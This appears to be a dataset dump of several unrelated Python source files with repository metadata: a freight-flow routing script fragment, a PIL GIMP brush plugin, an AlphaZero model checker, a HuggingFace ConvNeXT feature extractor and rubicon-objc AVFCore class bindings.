# n_list = [od_net.vs[n]['node'] for n in n_pth]
e_list = [od_net.es[n]['edge'] for n in e_pth]
# cst = sum([od_net.es[n]['cost'] for n in e_pth])
net_dict = {'Origin_id':o_node,'Destination_id':d_node,'Origin_region':o,'Destination_region':d,
'Tonnage':od_val,'edge_path':e_list,'node_path':[o_node,d_node]}
wr.writerow(net_dict.values())
dflows.append((str([o_node,d_node]),str(e_list),od_val))
print (o,d,fval,modes[m],ind)
node_table = modes[m] + '_node_flows'
edge_table = modes[m] + '_edge_flows'
# dom_flows = pd.read_csv(ofile).fillna(0)
dom_flows = pd.DataFrame(dflows,columns = ['node_path', 'edge_path','Tonnage'])
flow_node_edge = dom_flows.groupby(['node_path', 'edge_path'])['Tonnage'].sum().reset_index()
n_dict = {}
e_dict = {}
n_dict,e_dict = get_node_edge_flows(flow_node_edge,n_dict,e_dict)
node_list = get_id_flows(n_dict)
df = pd.DataFrame(node_list, columns = ['node_id',ind])
df.to_excel(excel_writer,node_table,index = False)
excel_writer.save()
edge_list = get_id_flows(e_dict)
df = pd.DataFrame(edge_list, columns = ['edge_id',ind])
df.to_excel(excel_writer,edge_table,index = False)
excel_writer.save()
if df.empty:
add_zeros_columns_to_table_psycopg2(mode_flow_tables[m], [ind],['double precision'],conn)
else:
df.to_sql('dummy_flows', engine, if_exists = 'replace', schema = 'public', index = False)
add_columns_to_table_psycopg2(mode_flow_tables[m], 'dummy_flows', [ind],['double precision'], 'edge_id',conn)
curs.close()
conn.close()
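# Illustrative helper (not part of the original analysis): a toy version of the
# modal-share step inside main(), kept as a function so importing this module has
# no side effects. All numbers below are made up.
def mode_share_example():
    """Show how per-OD-pair tonnages are turned into modal shares, with inland and
    coastal water combined into a single 'water' share."""
    toy = pd.DataFrame({'o': [1], 'd': [2], 'road': [60.0], 'rail': [20.0],
                        'air': [0.0], 'inland': [10.0], 'coastal': [10.0]})
    toy['total'] = toy[['road', 'rail', 'air', 'inland', 'coastal']].sum(axis=1)
    for m in ['road', 'rail', 'air', 'inland', 'coastal']:
        toy[m] = toy[m] / toy['total']
    toy['water'] = toy['inland'] + toy['coastal']
    return toy[['o', 'd', 'road', 'rail', 'air', 'water']]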
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
4ca5452f0df11cd0388491948693a1c50cf6a03e | 6be1990abf99c85ef886b49dcea1824aabb648d3 | /weixinofneolocal/weixinofneolocal/libs/PIL/GbrImagePlugin.py | ff0f60f5d130760331d401418d04076713c432fc | [] | no_license | neoguojing/cloudServer | b53ae205efe52cf0aea28dbb9e6c16c20caf991f | 7c19101789b0c46474269e4c8fe00e92203e9cd7 | refs/heads/master | 2020-12-04T23:02:23.551479 | 2017-09-22T03:08:35 | 2017-09-22T03:08:35 | 67,382,984 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,635 | py | #
# The Python Imaging Library
# $Id$
#
# load a GIMP brush file
#
# History:
# 96-03-14 fl Created
#
# Copyright (c) Secret Labs AB 1997.
# Copyright (c) Fredrik Lundh 1996.
#
# See the README file for information on usage and redistribution.
#
import Image, ImageFile
def i32(c):
return ord(c[3]) + (ord(c[2]) << 8) + (ord(c[1]) << 16) + (ord(c[0]) << 24L)
def _accept(prefix):
return i32(prefix) >= 20 and i32(prefix[4:8]) == 1
##
# Image plugin for the GIMP brush format.
class GbrImageFile(ImageFile.ImageFile):
format = "GBR"
format_description = "GIMP brush file"
def _open(self):
header_size = i32(self.fp.read(4))
version = i32(self.fp.read(4))
if header_size < 20 or version != 1:
raise SyntaxError, "not a GIMP brush"
width = i32(self.fp.read(4))
height = i32(self.fp.read(4))
bytes = i32(self.fp.read(4))
if width <= 0 or height <= 0 or bytes != 1:
raise SyntaxError, "not a GIMP brush"
comment = self.fp.read(header_size - 20)[:-1]
self.mode = "L"
self.size = width, height
self.info["comment"] = comment
# Since the brush is so small, we read the data immediately
self.data = self.fp.read(width * height)
def load(self):
if not self.data:
return
# create an image out of the brush data block
self.im = Image.core.new(self.mode, self.size)
self.im.fromstring(self.data)
self.data = ""
#
# registry
Image.register_open("GBR", GbrImageFile, _accept)
Image.register_extension("GBR", ".gbr")
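#
# usage sketch (not part of the original plugin): once the registrations above have
# run, GIMP brushes open through the normal PIL entry point; the file name below is
# hypothetical and must point at an existing .gbr file.
if __name__ == "__main__":
    im = Image.open("example_brush.gbr")
    im.load()
    print im.size, im.info["comment"]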
| [
"[email protected]"
] | |
c2afa2f4ed3d27b5eb256f45fbb043bb45179a34 | e167dfb535b72f56ea3c30c498f2a74324e9e04c | /app/common/model_utils.py | 7b0f98496899cb726bdd5a7ea11ccb8adc155300 | [
"MIT"
] | permissive | wlmsoft/Alpha-Gobang-Zero | ebde341af3ac6ecd9b6a71fdb0decedce078d2e8 | f836aee7147aa2aeb47dd8b370f94950b833718d | refs/heads/master | 2023-07-23T20:40:51.448213 | 2021-09-02T14:42:25 | 2021-09-02T14:42:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 327 | py | # coding:utf-8
import torch
from alphazero import PolicyValueNet
def testModel(model: str):
""" 测试模型是否可用
Parameters
----------
model: str
模型路径
"""
try:
model = torch.load(model)
return isinstance(model, PolicyValueNet)
    except Exception:
return False
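if __name__ == "__main__":
    # Usage sketch (the path below is hypothetical): prints True only when the file
    # deserializes to a PolicyValueNet instance, False on any failure.
    print(testModel('model/policy_value_net.pth'))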
| [
"[email protected]"
] | |
bd15811b1f2fa433f9fbce560c2bb146a9882c43 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/built-in/nlp/Bert-text-classification_for_PyTorch/transformers/src/transformers/models/convnext/feature_extraction_convnext.py | 860bda96b6d2ca7b488d2f710a55318ee5e5e41c | [
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 7,348 | py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Feature extractor class for ConvNeXT."""
from typing import Optional, Union
import numpy as np
from PIL import Image
from ...feature_extraction_utils import BatchFeature, FeatureExtractionMixin
from ...file_utils import TensorType
from ...image_utils import (
IMAGENET_DEFAULT_MEAN,
IMAGENET_DEFAULT_STD,
ImageFeatureExtractionMixin,
ImageInput,
is_torch_tensor,
)
from ...utils import logging
logger = logging.get_logger(__name__)
class ConvNextFeatureExtractor(FeatureExtractionMixin, ImageFeatureExtractionMixin):
r"""
Constructs a ConvNeXT feature extractor.
This feature extractor inherits from [`FeatureExtractionMixin`] which contains most of the main methods. Users
should refer to this superclass for more information regarding those methods.
Args:
do_resize (`bool`, *optional*, defaults to `True`):
Whether to resize (and optionally center crop) the input to a certain `size`.
size (`int`, *optional*, defaults to 224):
Resize the input to the given size. If 384 or larger, the image is resized to (`size`, `size`). Else, the
smaller edge of the image will be matched to int(`size`/ `crop_pct`), after which the image is cropped to
`size`. Only has an effect if `do_resize` is set to `True`.
resample (`int`, *optional*, defaults to `PIL.Image.BICUBIC`):
An optional resampling filter. This can be one of `PIL.Image.NEAREST`, `PIL.Image.BOX`,
`PIL.Image.BILINEAR`, `PIL.Image.HAMMING`, `PIL.Image.BICUBIC` or `PIL.Image.LANCZOS`. Only has an effect
if `do_resize` is set to `True`.
crop_pct (`float`, *optional*):
The percentage of the image to crop. If `None`, then a cropping percentage of 224 / 256 is used. Only has
an effect if `do_resize` is set to `True` and `size` < 384.
do_normalize (`bool`, *optional*, defaults to `True`):
Whether or not to normalize the input with mean and standard deviation.
image_mean (`List[int]`, defaults to `[0.485, 0.456, 0.406]`):
The sequence of means for each channel, to be used when normalizing images.
image_std (`List[int]`, defaults to `[0.229, 0.224, 0.225]`):
The sequence of standard deviations for each channel, to be used when normalizing images.
"""
model_input_names = ["pixel_values"]
def __init__(
self,
do_resize=True,
size=224,
resample=Image.BICUBIC,
crop_pct=None,
do_normalize=True,
image_mean=None,
image_std=None,
**kwargs
):
super().__init__(**kwargs)
self.do_resize = do_resize
self.size = size
self.resample = resample
self.crop_pct = crop_pct
self.do_normalize = do_normalize
self.image_mean = image_mean if image_mean is not None else IMAGENET_DEFAULT_MEAN
self.image_std = image_std if image_std is not None else IMAGENET_DEFAULT_STD
def __call__(
self, images: ImageInput, return_tensors: Optional[Union[str, TensorType]] = None, **kwargs
) -> BatchFeature:
"""
Main method to prepare for the model one or several image(s).
<Tip warning={true}>
NumPy arrays and PyTorch tensors are converted to PIL images when resizing, so the most efficient is to pass
PIL images.
</Tip>
Args:
images (`PIL.Image.Image`, `np.ndarray`, `torch.Tensor`, `List[PIL.Image.Image]`, `List[np.ndarray]`, `List[torch.Tensor]`):
The image or batch of images to be prepared. Each image can be a PIL image, NumPy array or PyTorch
tensor. In case of a NumPy array/PyTorch tensor, each image should be of shape (C, H, W), where C is a
number of channels, H and W are image height and width.
return_tensors (`str` or [`~file_utils.TensorType`], *optional*, defaults to `'np'`):
If set, will return tensors of a particular framework. Acceptable values are:
- `'tf'`: Return TensorFlow `tf.constant` objects.
- `'pt'`: Return PyTorch `torch.Tensor` objects.
- `'np'`: Return NumPy `np.ndarray` objects.
- `'jax'`: Return JAX `jnp.ndarray` objects.
Returns:
[`BatchFeature`]: A [`BatchFeature`] with the following fields:
- **pixel_values** -- Pixel values to be fed to a model, of shape (batch_size, num_channels, height,
width).
"""
# Input type checking for clearer error
valid_images = False
# Check that images has a valid type
if isinstance(images, (Image.Image, np.ndarray)) or is_torch_tensor(images):
valid_images = True
elif isinstance(images, (list, tuple)):
if len(images) == 0 or isinstance(images[0], (Image.Image, np.ndarray)) or is_torch_tensor(images[0]):
valid_images = True
if not valid_images:
raise ValueError(
"Images must of type `PIL.Image.Image`, `np.ndarray` or `torch.Tensor` (single example), "
"`List[PIL.Image.Image]`, `List[np.ndarray]` or `List[torch.Tensor]` (batch of examples)."
)
is_batched = bool(
isinstance(images, (list, tuple))
and (isinstance(images[0], (Image.Image, np.ndarray)) or is_torch_tensor(images[0]))
)
if not is_batched:
images = [images]
# transformations (resizing and optional center cropping + normalization)
if self.do_resize and self.size is not None:
if self.size >= 384:
# warping (no cropping) when evaluated at 384 or larger
images = [self.resize(image=image, size=self.size, resample=self.resample) for image in images]
else:
if self.crop_pct is None:
self.crop_pct = 224 / 256
size = int(self.size / self.crop_pct)
# to maintain same ratio w.r.t. 224 images
images = [
self.resize(image=image, size=size, default_to_square=False, resample=self.resample)
for image in images
]
images = [self.center_crop(image=image, size=self.size) for image in images]
if self.do_normalize:
images = [self.normalize(image=image, mean=self.image_mean, std=self.image_std) for image in images]
# return as BatchFeature
data = {"pixel_values": images}
encoded_inputs = BatchFeature(data=data, tensor_type=return_tensors)
return encoded_inputs
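if __name__ == "__main__":
    # Usage sketch (not part of the original module): run the extractor on a synthetic
    # RGB image so no external file is needed. With size=224 (< 384) the image is first
    # resized so its shorter edge is int(224 / crop_pct) = 256, then center-cropped to 224.
    dummy_image = Image.fromarray(np.zeros((300, 400, 3), dtype=np.uint8))
    feature_extractor = ConvNextFeatureExtractor(size=224)
    encoded = feature_extractor(images=dummy_image, return_tensors="np")
    print(encoded["pixel_values"].shape)  # expected: (1, 3, 224, 224)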
| [
"[email protected]"
] | |
16b93229b03936799fb366deb70beeb32959ddde | 16caebb320bb10499d3712bf0bdc07539a4d0007 | /objc/_AVFCore.py | 8eff0d83bfa6c2ce26f78a9b763e51d9f784ce49 | [] | no_license | swosnick/Apple-Frameworks-Python | 876d30f308a7ac1471b98a9da2fabd22f30c0fa5 | 751510137e9fa35cc806543db4e4415861d4f252 | refs/heads/master | 2022-12-08T07:08:40.154553 | 2020-09-04T17:36:24 | 2020-09-04T17:36:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,715 | py | '''
Classes from the 'AVFCore' framework.
'''
try:
from rubicon.objc import ObjCClass
except ValueError:
def ObjCClass(name):
return None
def _Class(name):
try:
return ObjCClass(name)
except NameError:
return None
AVStreamDataParser = _Class('AVStreamDataParser')
AVStreamDataParserInternal = _Class('AVStreamDataParserInternal')
AVRouteDetector = _Class('AVRouteDetector')
AVRouteDetectorInternal = _Class('AVRouteDetectorInternal')
AVFigEndpointUIAgentOutputDeviceAuthorizationRequestImpl = _Class('AVFigEndpointUIAgentOutputDeviceAuthorizationRequestImpl')
AVFigEndpointUIAgentOutputDeviceAuthorizationSessionImpl = _Class('AVFigEndpointUIAgentOutputDeviceAuthorizationSessionImpl')
AVContentKeyReportGroup = _Class('AVContentKeyReportGroup')
AVContentKeySession = _Class('AVContentKeySession')
AVContentKeySessionInternal = _Class('AVContentKeySessionInternal')
AVContentKeyResponseInternal = _Class('AVContentKeyResponseInternal')
AVContentKeyResponse = _Class('AVContentKeyResponse')
AVContentKeyResponseAuthorizationToken = _Class('AVContentKeyResponseAuthorizationToken')
AVContentKeyResponseClearKey = _Class('AVContentKeyResponseClearKey')
AVContentKeyResponseFairPlayStreaming = _Class('AVContentKeyResponseFairPlayStreaming')
AVContentKeyRequest = _Class('AVContentKeyRequest')
AVPersistableContentKeyRequest = _Class('AVPersistableContentKeyRequest')
AVContentKeyRequestInternal = _Class('AVContentKeyRequestInternal')
AVHUDStringGenerator = _Class('AVHUDStringGenerator')
AVMutableMovieInternal = _Class('AVMutableMovieInternal')
AVMovieInternal = _Class('AVMovieInternal')
AVMediaDataStorage = _Class('AVMediaDataStorage')
AVMediaDataStorageInternal = _Class('AVMediaDataStorageInternal')
AVFigEndpointUIAgentOutputContextManagerImpl = _Class('AVFigEndpointUIAgentOutputContextManagerImpl')
AVFigCommChannelUUIDOutputContextCommunicationChannelImpl = _Class('AVFigCommChannelUUIDOutputContextCommunicationChannelImpl')
AVFigRouteDescriptorFigRoutingContextOutputDeviceTranslator = _Class('AVFigRouteDescriptorFigRoutingContextOutputDeviceTranslator')
AVFigEndpointFigRoutingContextOutputDeviceTranslator = _Class('AVFigEndpointFigRoutingContextOutputDeviceTranslator')
AVFigCommChannelUUIDCommunicationChannelManager = _Class('AVFigCommChannelUUIDCommunicationChannelManager')
AVFigRoutingContextOutputContextImpl = _Class('AVFigRoutingContextOutputContextImpl')
AVVideoCompositionRenderContext = _Class('AVVideoCompositionRenderContext')
AVVideoCompositionRenderContextInternal = _Class('AVVideoCompositionRenderContextInternal')
AVKeyPathFlattenerKVOIntrospectionShim = _Class('AVKeyPathFlattenerKVOIntrospectionShim')
AVKeyPathFlattener = _Class('AVKeyPathFlattener')
AVTwoPartKeyPath = _Class('AVTwoPartKeyPath')
AVKeyPathDependency = _Class('AVKeyPathDependency')
AVKeyPathDependencyManager = _Class('AVKeyPathDependencyManager')
AVWeakObservableCallbackCancellationHelper = _Class('AVWeakObservableCallbackCancellationHelper')
AVWeaklyObservedObjectClientBlockKVONotifier = _Class('AVWeaklyObservedObjectClientBlockKVONotifier')
AVClientBlockKVONotifier = _Class('AVClientBlockKVONotifier')
AVWeakObservationBlockFactory = _Class('AVWeakObservationBlockFactory')
AVObservationBlockFactory = _Class('AVObservationBlockFactory')
AVKVODispatcher = _Class('AVKVODispatcher')
AVAsynchronousVideoCompositionRequest = _Class('AVAsynchronousVideoCompositionRequest')
AVAsynchronousVideoCompositionRequestInternal = _Class('AVAsynchronousVideoCompositionRequestInternal')
AVFigEndpointOutputDeviceDiscoverySessionAvailableOutputDevicesImpl = _Class('AVFigEndpointOutputDeviceDiscoverySessionAvailableOutputDevicesImpl')
AVCustomVideoCompositorSession = _Class('AVCustomVideoCompositorSession')
AVExternalDevice = _Class('AVExternalDevice')
AVExternalDeviceTurnByTurnToken = _Class('AVExternalDeviceTurnByTurnToken')
AVExternalDeviceScreenBorrowToken = _Class('AVExternalDeviceScreenBorrowToken')
AVExternalDeviceInternal = _Class('AVExternalDeviceInternal')
AVExternalDeviceIcon = _Class('AVExternalDeviceIcon')
AVExternalDeviceIconInternal = _Class('AVExternalDeviceIconInternal')
AVExternalDeviceHID = _Class('AVExternalDeviceHID')
AVExternalDeviceHIDInternal = _Class('AVExternalDeviceHIDInternal')
AVMediaSelection = _Class('AVMediaSelection')
AVMutableMediaSelection = _Class('AVMutableMediaSelection')
AVMediaSelectionInternal = _Class('AVMediaSelectionInternal')
AVIOKitOutputSettingsAssistantVideoEncoderCapabilities = _Class('AVIOKitOutputSettingsAssistantVideoEncoderCapabilities')
AVExportSettingsOutputSettingsAssistantVideoSettingsAdjuster = _Class('AVExportSettingsOutputSettingsAssistantVideoSettingsAdjuster')
AVExportSettingsOutputSettingsAssistantBaseSettings = _Class('AVExportSettingsOutputSettingsAssistantBaseSettings')
AVOutputSettingsAssistant = _Class('AVOutputSettingsAssistant')
AVOutputSettingsAssistantInternal = _Class('AVOutputSettingsAssistantInternal')
AVCoreImageFilterCustomVideoCompositor = _Class('AVCoreImageFilterCustomVideoCompositor')
AVCoreImageFilterVideoCompositionInstruction = _Class('AVCoreImageFilterVideoCompositionInstruction')
AVAsynchronousCIImageFilteringRequest = _Class('AVAsynchronousCIImageFilteringRequest')
AVAsynchronousCIImageFilteringRequestInternal = _Class('AVAsynchronousCIImageFilteringRequestInternal')
AVFigRouteDescriptorOutputDeviceDiscoverySessionAvailableOutputDevicesImpl = _Class('AVFigRouteDescriptorOutputDeviceDiscoverySessionAvailableOutputDevicesImpl')
AVFigRouteDiscovererOutputDeviceDiscoverySessionImpl = _Class('AVFigRouteDiscovererOutputDeviceDiscoverySessionImpl')
AVFigRouteDiscovererOutputDeviceDiscoverySessionFactory = _Class('AVFigRouteDiscovererOutputDeviceDiscoverySessionFactory')
AVPlayerItemLegibleOutputInternal = _Class('AVPlayerItemLegibleOutputInternal')
AVPlayerItemLegibleOutputRealDependencyFactory = _Class('AVPlayerItemLegibleOutputRealDependencyFactory')
AVPlayerMediaSelectionCriteria = _Class('AVPlayerMediaSelectionCriteria')
AVTextStyleRule = _Class('AVTextStyleRule')
AVTextStyleRuleInternal = _Class('AVTextStyleRuleInternal')
AVRemoteFigSampleBufferRenderSynchronizerFactory = _Class('AVRemoteFigSampleBufferRenderSynchronizerFactory')
AVSampleBufferRenderSynchronizer = _Class('AVSampleBufferRenderSynchronizer')
AVSampleBufferRenderSynchronizerInternal = _Class('AVSampleBufferRenderSynchronizerInternal')
AVAssetResourceLoadingRequestor = _Class('AVAssetResourceLoadingRequestor')
AVAssetResourceLoadingRequestorInternal = _Class('AVAssetResourceLoadingRequestorInternal')
AVAssetResourceLoadingRequest = _Class('AVAssetResourceLoadingRequest')
AVAssetResourceRenewalRequest = _Class('AVAssetResourceRenewalRequest')
AVAssetResourceLoadingRequestInternal = _Class('AVAssetResourceLoadingRequestInternal')
AVAssetResourceLoadingDataRequest = _Class('AVAssetResourceLoadingDataRequest')
AVAssetResourceLoadingDataRequestInternal = _Class('AVAssetResourceLoadingDataRequestInternal')
AVAssetResourceLoadingContentInformationRequest = _Class('AVAssetResourceLoadingContentInformationRequest')
AVAssetResourceLoadingContentInformationRequestInternal = _Class('AVAssetResourceLoadingContentInformationRequestInternal')
AVAssetResourceLoader = _Class('AVAssetResourceLoader')
AVAssetResourceLoaderInternal = _Class('AVAssetResourceLoaderInternal')
AVAssetResourceLoaderRemoteHandlerContext = _Class('AVAssetResourceLoaderRemoteHandlerContext')
AVPixelBufferAttributeMediator = _Class('AVPixelBufferAttributeMediator')
AVSampleBufferDisplayLayerInternal = _Class('AVSampleBufferDisplayLayerInternal')
AVAPSyncControllerOutputDeviceImpl = _Class('AVAPSyncControllerOutputDeviceImpl')
AVPlayerItemVideoOutputInternal = _Class('AVPlayerItemVideoOutputInternal')
AVPlayerItemOutputInternal = _Class('AVPlayerItemOutputInternal')
AVAssetDownloadSession = _Class('AVAssetDownloadSession')
AVAssetDownloadSessionInternal = _Class('AVAssetDownloadSessionInternal')
AVFloat64Range = _Class('AVFloat64Range')
AVAudioSettingsValueConstrainer = _Class('AVAudioSettingsValueConstrainer')
AVAssetSegmentReport = _Class('AVAssetSegmentReport')
AVAssetSegmentTrackReport = _Class('AVAssetSegmentTrackReport')
AVAssetSegmentReportSampleInformation = _Class('AVAssetSegmentReportSampleInformation')
AVMediaFileOutputSettingsValidator = _Class('AVMediaFileOutputSettingsValidator')
AVGenericMediaFileOutputSettingsValidator = _Class('AVGenericMediaFileOutputSettingsValidator')
AVISOOutputSettingsValidator = _Class('AVISOOutputSettingsValidator')
AVAIFCOutputSettingsValidator = _Class('AVAIFCOutputSettingsValidator')
AVAIFFOutputSettingsValidator = _Class('AVAIFFOutputSettingsValidator')
AVWAVEOutputSettingsValidator = _Class('AVWAVEOutputSettingsValidator')
AVMediaFileType = _Class('AVMediaFileType')
AVDisplayCriteria = _Class('AVDisplayCriteria')
AVDisplayCriteriaInternal = _Class('AVDisplayCriteriaInternal')
AVFormatSpecification = _Class('AVFormatSpecification')
AVOutputSettings = _Class('AVOutputSettings')
AVVideoOutputSettings = _Class('AVVideoOutputSettings')
AVAVVideoSettingsVideoOutputSettings = _Class('AVAVVideoSettingsVideoOutputSettings')
AVPixelBufferAttributesVideoOutputSettings = _Class('AVPixelBufferAttributesVideoOutputSettings')
AVAudioOutputSettings = _Class('AVAudioOutputSettings')
AVAVAudioSettingsAudioOutputSettings = _Class('AVAVAudioSettingsAudioOutputSettings')
AVMediaSelectionOptionInternal = _Class('AVMediaSelectionOptionInternal')
AVMediaSelectionGroupInternal = _Class('AVMediaSelectionGroupInternal')
AVAudioSessionMediaPlayerOnly = _Class('AVAudioSessionMediaPlayerOnly')
AVAudioSessionMediaPlayerOnlyInternal = _Class('AVAudioSessionMediaPlayerOnlyInternal')
AVPlayerItemErrorLogEvent = _Class('AVPlayerItemErrorLogEvent')
AVPlayerItemErrorLogEventInternal = _Class('AVPlayerItemErrorLogEventInternal')
AVPlayerItemErrorLog = _Class('AVPlayerItemErrorLog')
AVPlayerItemErrorLogInternal = _Class('AVPlayerItemErrorLogInternal')
AVPlayerItemAccessLogEvent = _Class('AVPlayerItemAccessLogEvent')
AVPlayerItemAccessLogEventInternal = _Class('AVPlayerItemAccessLogEventInternal')
AVPlayerItemAccessLog = _Class('AVPlayerItemAccessLog')
AVPlayerItemAccessLogInternal = _Class('AVPlayerItemAccessLogInternal')
AVAssetDownloadCacheInternal = _Class('AVAssetDownloadCacheInternal')
AVManagedAssetCacheInternal = _Class('AVManagedAssetCacheInternal')
AVAssetCache = _Class('AVAssetCache')
AVAssetDownloadCache = _Class('AVAssetDownloadCache')
AVManagedAssetCache = _Class('AVManagedAssetCache')
AVDateRangeMetadataGroupInternal = _Class('AVDateRangeMetadataGroupInternal')
AVTimedMetadataGroupInternal = _Class('AVTimedMetadataGroupInternal')
AVMetadataGroup = _Class('AVMetadataGroup')
AVDateRangeMetadataGroup = _Class('AVDateRangeMetadataGroup')
AVMutableDateRangeMetadataGroup = _Class('AVMutableDateRangeMetadataGroup')
AVTimedMetadataGroup = _Class('AVTimedMetadataGroup')
AVMutableTimedMetadataGroup = _Class('AVMutableTimedMetadataGroup')
AVDispatchOnce = _Class('AVDispatchOnce')
AVEventWaiter = _Class('AVEventWaiter')
AVAPSyncOutputDeviceCommunicationChannelImpl = _Class('AVAPSyncOutputDeviceCommunicationChannelImpl')
AVAPSyncOutputDeviceCommunicationChannelManager = _Class('AVAPSyncOutputDeviceCommunicationChannelManager')
AVAssetTrackGroup = _Class('AVAssetTrackGroup')
AVAssetTrackGroupInternal = _Class('AVAssetTrackGroupInternal')
AVPlayerItemMediaDataCollectorInternal = _Class('AVPlayerItemMediaDataCollectorInternal')
AVCMNotificationDispatcherListenerKey = _Class('AVCMNotificationDispatcherListenerKey')
AVCMNotificationDispatcher = _Class('AVCMNotificationDispatcher')
AVAPSyncControllerRemoteOutputDeviceGroupImpl = _Class('AVAPSyncControllerRemoteOutputDeviceGroupImpl')
AVCallbackContextRegistry = _Class('AVCallbackContextRegistry')
AVFigRoutingContextCommandOutputDeviceConfiguration = _Class('AVFigRoutingContextCommandOutputDeviceConfiguration')
AVFigRoutingContextCommandOutputDeviceConfigurationModification = _Class('AVFigRoutingContextCommandOutputDeviceConfigurationModification')
AVWeakReference = _Class('AVWeakReference')
AVRetainReleaseWeakReference = _Class('AVRetainReleaseWeakReference')
AVResult = _Class('AVResult')
AVAssetInspectorLoader = _Class('AVAssetInspectorLoader')
AVUnreachableAssetInspectorLoader = _Class('AVUnreachableAssetInspectorLoader')
AVFigAssetInspectorLoader = _Class('AVFigAssetInspectorLoader')
AVAssetMakeReadyForInspectionLoader = _Class('AVAssetMakeReadyForInspectionLoader')
AVPlaybackItemInspectorLoader = _Class('AVPlaybackItemInspectorLoader')
AVAssetSynchronousInspectorLoader = _Class('AVAssetSynchronousInspectorLoader')
AVDepartureAnnouncingObjectMonitor = _Class('AVDepartureAnnouncingObjectMonitor')
AVGlobalOperationQueue = _Class('AVGlobalOperationQueue')
AVWeakReferencingDelegateStorage = _Class('AVWeakReferencingDelegateStorage')
AVScheduledAudioParameters = _Class('AVScheduledAudioParameters')
AVMutableScheduledAudioParameters = _Class('AVMutableScheduledAudioParameters')
AVScheduledAudioParametersInternal = _Class('AVScheduledAudioParametersInternal')
AVVideoPerformanceMetrics = _Class('AVVideoPerformanceMetrics')
AVVideoPerformanceMetricsInternal = _Class('AVVideoPerformanceMetricsInternal')
AVMutableMovieTrackInternal = _Class('AVMutableMovieTrackInternal')
AVMovieTrackInternal = _Class('AVMovieTrackInternal')
AVSystemRemotePoolOutputDeviceCommunicationChannelImpl = _Class('AVSystemRemotePoolOutputDeviceCommunicationChannelImpl')
AVSystemRemotePoolOutputDeviceCommunicationChannelManager = _Class('AVSystemRemotePoolOutputDeviceCommunicationChannelManager')
AVOutputContextManager = _Class('AVOutputContextManager')
AVOutputContextManagerInternal = _Class('AVOutputContextManagerInternal')
AVOutputContextDestinationChange = _Class('AVOutputContextDestinationChange')
AVOutputContextDestinationChangeInternal = _Class('AVOutputContextDestinationChangeInternal')
AVOutputContextCommunicationChannel = _Class('AVOutputContextCommunicationChannel')
AVOutputContextCommunicationChannelInternal = _Class('AVOutputContextCommunicationChannelInternal')
AVOutputContext = _Class('AVOutputContext')
AVOutputContextInternal = _Class('AVOutputContextInternal')
AVRunLoopConditionRunLoopState = _Class('AVRunLoopConditionRunLoopState')
AVAudioMixInputParametersInternal = _Class('AVAudioMixInputParametersInternal')
AVAudioMixInputParameters = _Class('AVAudioMixInputParameters')
AVMutableAudioMixInputParameters = _Class('AVMutableAudioMixInputParameters')
AVAudioMixInternal = _Class('AVAudioMixInternal')
AVAudioMix = _Class('AVAudioMix')
AVMutableAudioMix = _Class('AVMutableAudioMix')
AVAssetCustomURLAuthentication = _Class('AVAssetCustomURLAuthentication')
AVAssetCustomURLBridgeForNSURLProtocol = _Class('AVAssetCustomURLBridgeForNSURLProtocol')
AVAssetCustomURLBridgeForNSURLSession = _Class('AVAssetCustomURLBridgeForNSURLSession')
AVAssetCustomURLRequest = _Class('AVAssetCustomURLRequest')
AVNSURLProtocolRequest = _Class('AVNSURLProtocolRequest')
AVFigEndpointSecondDisplayModeToken = _Class('AVFigEndpointSecondDisplayModeToken')
AVFigEndpointOutputDeviceImpl = _Class('AVFigEndpointOutputDeviceImpl')
AVFigRouteDescriptorOutputDeviceImpl = _Class('AVFigRouteDescriptorOutputDeviceImpl')
AVClusterComponentOutputDeviceDescription = _Class('AVClusterComponentOutputDeviceDescription')
AVOutputDeviceCommunicationChannel = _Class('AVOutputDeviceCommunicationChannel')
AVLocalOutputDeviceImpl = _Class('AVLocalOutputDeviceImpl')
AVPairedDevice = _Class('AVPairedDevice')
AVPairedDeviceInternal = _Class('AVPairedDeviceInternal')
AVOutputDeviceAuthorizedPeer = _Class('AVOutputDeviceAuthorizedPeer')
AVOutputDeviceAuthorizedPeerInternal = _Class('AVOutputDeviceAuthorizedPeerInternal')
AVOutputDeviceLegacyFrecentsWriter = _Class('AVOutputDeviceLegacyFrecentsWriter')
AVOutputDeviceLegacyFrecentsReader = _Class('AVOutputDeviceLegacyFrecentsReader')
AVOutputDeviceFrecentsWriter = _Class('AVOutputDeviceFrecentsWriter')
AVOutputDeviceFrecentsReader = _Class('AVOutputDeviceFrecentsReader')
AVOutputDeviceFrecencyManager = _Class('AVOutputDeviceFrecencyManager')
AVOutputDevice = _Class('AVOutputDevice')
AVOutputDeviceInternal = _Class('AVOutputDeviceInternal')
AVMediaDataRequester = _Class('AVMediaDataRequester')
AVSerializedMostlySynchronousReentrantBlockScheduler = _Class('AVSerializedMostlySynchronousReentrantBlockScheduler')
AVSynchronousBlockScheduler = _Class('AVSynchronousBlockScheduler')
AVFragmentedMovieTrackInternal = _Class('AVFragmentedMovieTrackInternal')
AVExecutionEnvironment = _Class('AVExecutionEnvironment')
AVSampleBufferVideoOutput = _Class('AVSampleBufferVideoOutput')
AVSampleBufferVideoOutputInternal = _Class('AVSampleBufferVideoOutputInternal')
AVExternalPlaybackMonitor = _Class('AVExternalPlaybackMonitor')
